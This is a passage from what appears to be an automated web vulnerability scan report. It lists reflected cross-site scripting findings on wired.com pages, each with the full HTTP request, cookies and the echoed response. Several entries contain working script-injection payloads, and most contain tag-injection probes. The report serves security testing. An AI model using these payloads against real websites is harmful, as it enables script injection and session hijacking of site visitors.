GET /culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c45a8"><a>9f611b39064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec45a8"><a>9f611b39064/education HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:03 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec45a8"><a>9f611b39064 ss_education"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c85"><a>d84992dbbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/educationb2c85"><a>d84992dbbe HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29261 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:27 GMT Date: Sun, 21 Nov 2010 23:06:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_educationb2c85"><a>d84992dbbe"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4cf"><a>703cee33c83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureaf4cf"><a>703cee33c83/lifestyle HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:04 GMT Date: Sun, 21 Nov 2010 23:06:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureaf4cf"><a>703cee33c83 ss_lifestyle"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f876e"><a>59992d190ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestylef876e"><a>59992d190ca HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=588 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestylef876e"><a>59992d190ca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a99"><a>d3ff9573830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture95a99"><a>d3ff9573830/lifestyle/multimedia/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture95a99"><a>d3ff9573830 ss_lifestyle c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 904b7"><a>ee778010cae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle904b7"><a>ee778010cae/multimedia/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:37 GMT Date: Sun, 21 Nov 2010 23:06:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle904b7"><a>ee778010cae c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a306"><a>ecc32f97413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/multimedia4a306"><a>ecc32f97413/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:55 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_multimedia4a306"><a>ecc32f97413"> ...[SNIP]...
1.101. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e513"><script>alert(1)</script>0b37a4181f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca90b"><a>e339c09d9c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureca90b"><a>e339c09d9c5/lifestyle/multimedia/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureca90b"><a>e339c09d9c5 ss_lifestyle c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42d5a"><a>f39aa6a9d07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle42d5a"><a>f39aa6a9d07/multimedia/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:36 GMT Date: Sun, 21 Nov 2010 23:06:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle42d5a"><a>f39aa6a9d07 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8a"><a>c696540734e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/multimedia31c8a"><a>c696540734e/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:51 GMT Date: Sun, 21 Nov 2010 23:06:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_multimedia31c8a"><a>c696540734e"> ...[SNIP]...
1.105. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cdb"><script>alert(1)</script>0fe75b71068 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:17 GMT Date: Sun, 21 Nov 2010 23:06:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127a6"><a>a9774cc0e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture127a6"><a>a9774cc0e66/lifestyle/news/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture127a6"><a>a9774cc0e66 ss_lifestyle c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a43"><a>9a2824aad23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle62a43"><a>9a2824aad23/news/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:35 GMT Date: Sun, 21 Nov 2010 23:06:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle62a43"><a>9a2824aad23 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c9a"><a>b4bd5c0f5f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/newsf6c9a"><a>b4bd5c0f5f4/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:52 GMT Date: Sun, 21 Nov 2010 23:06:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_newsf6c9a"><a>b4bd5c0f5f4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bee7"><a>1f9ffde2136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture3bee7"><a>1f9ffde2136/lifestyle/news/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture3bee7"><a>1f9ffde2136 ss_lifestyle c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d26d"><a>83866788be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
